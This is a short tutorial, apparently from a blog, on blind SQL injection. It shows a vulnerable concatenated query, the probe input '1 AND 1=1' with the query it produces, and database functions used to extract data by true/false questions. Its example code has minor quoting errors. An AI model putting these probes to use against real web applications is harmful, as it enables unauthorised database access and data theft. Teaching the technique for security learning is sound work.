BLIND SQL INJECTION - WEB APPLICATION VULNERABILITY TUTORIAL



Blind SQL injection technique is used when the web application is vulnerable but the output doesn’t display to the attacker. When hacker tries SQL injection, they will redirect to some other pages instead of error message. Blind SQL Injection is harder to implement when compared with the above Traditional SQL Injection Technique, it will take more time . There are some tools for Blind SQL Injection.
Blind SQL injection can be done by querying the database with sequence of true/false questions.

How to detect the Blind SQL Injection Vulnerability?
Web application gets the clients input and supplied in where clause to retrieve data from Database. For instance, let us say the web application gets id and supplied to the sql query as follows
Statement=”select * from userinfo where id=` “+id+” ` “;
Hope you know about where clause and compound conditions (OR, AND). OR and AND are used to combine two conditions. The attacker can find the vulnerability by entering the compound conditions as input.
For instance, the attacker can enter id value as
1 AND 1=1 
The above query will become
Select * from userinfo WHERE id=1 AND 1=1
If the page remains on the same page, then the application may be vulnerable. This type of vulnerability occurs when the developer fails to validate the data type of ID. Here we give true condition (1=1). So if use false condition (1=2), it will raise an error message. We can conclude that if the condition is true, it remains in page. If false, showing error message.

Some Functions to be known
The following function will be useful for Blind SQL Injection.
substring(str, pos, length) is the function that returns the part of the String. sub string of the string is depending on the argument given to the function.

For instance substring(“hello”,2,1) will returns ‘e’. 
Here string is “hello”, character position is 2 (that is ‘e’), and length is 1.
  • lower(str) is the function that converts the character to lower case
  • ascii(c) is the function that converts the character to ASCII value.
  • length(str) returns the length of the string .
  • user() returns the current user(admin)
  • database() returns the database name.
  • version() retruns the version of database

0 comments :

Please Enter best of your Comments